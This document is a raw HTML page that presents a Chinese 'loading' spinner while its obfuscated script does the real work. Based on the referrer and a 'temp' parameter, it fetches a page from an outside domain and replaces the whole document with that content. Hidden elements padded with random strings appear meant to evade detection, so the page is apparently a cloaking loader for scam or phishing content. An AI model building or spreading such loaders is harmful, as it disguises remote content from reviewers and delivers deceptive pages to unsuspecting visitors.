<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Yv4M4Ne {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Yv4M4Ne .WoPJPgna0r {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Yv4M4Ne .content {
            line-height: 50px;
            text-align: center
        }

        .Yv4M4Ne .img {
            width: 100%
        }

        .Yv4M4Ne .XkeuhhY {
            text-align: center
        }

        .Yv4M4Ne .XkeuhhY span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Yv4M4Ne .XkeuhhY span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Yv4M4Ne .XkeuhhY span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Yv4M4Ne .XkeuhhY span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Yv4M4Ne .XkeuhhY span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Yv4M4Ne .XkeuhhY span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Yv4M4Ne .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eHrzyTvvCH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var b6tr1Oe = eHrzyTvvCH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ b6tr1Oe +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ b6tr1Oe +".html?a=share";
		}
		
        ZMicxr=url+"#"+new Date().getTime();
        ZMicxr && function() {
            $.get(ZMicxr, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >yQUXIYxiWSvSwzm9FJqJ6KQbQXWlpHpXQ8AGTOihe2Ad5AM2dGq6GuSDR4dy9cFPBGF6NgdviW</li>
<span style='display:none'>u4ZxqbU3wjB3zK7rZBFhjhSz7XUllYG1</span>
<div style='display:none'>EesiZRMQuRCNua18qNVbhzvlm5j0z2o9csf9K2FXl4EEAB6ePPpQG0G4SnkHUqQNxMBtYE0ojMfdF7mjXTDE9bXCfcSFBJsWg2xGS</div>
<a  href='#' style='display:none'>fw5WKT1hz0kkvw8mWeDD8e6uRQ9pzuy15cTB8Nfx4mtt6Hmw50AlWkwa0vSmy</a>
<p  style='display:none'>Y5RoRTadYVS3d1auQOZelQpqWgePfGhwkpLNJX0iavAejLQwsqU14Ycz</p><div class="Yv4M4Ne">
    <div class="WoPJPgna0r">
        <div class="XkeuhhY">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >FrwZjgApIgHHs8eUo4gGBKDora5vFivakfRfKbyJZNG</ul>
<span style='display:none'>x1LbHoSHpCac0T8I3bNS53xv3jrdTbhpGtnvAsw0xmeuY3v5tRwaHUVybIRMxqZrHkeE90DCSd9bCEemw1er</span>
<h1 style='display:none' >kARWexPMXaJWGanfwDUIoD81sLPLfuSPgdvjVcprUpFnJ6SZ</h1></body>
</html>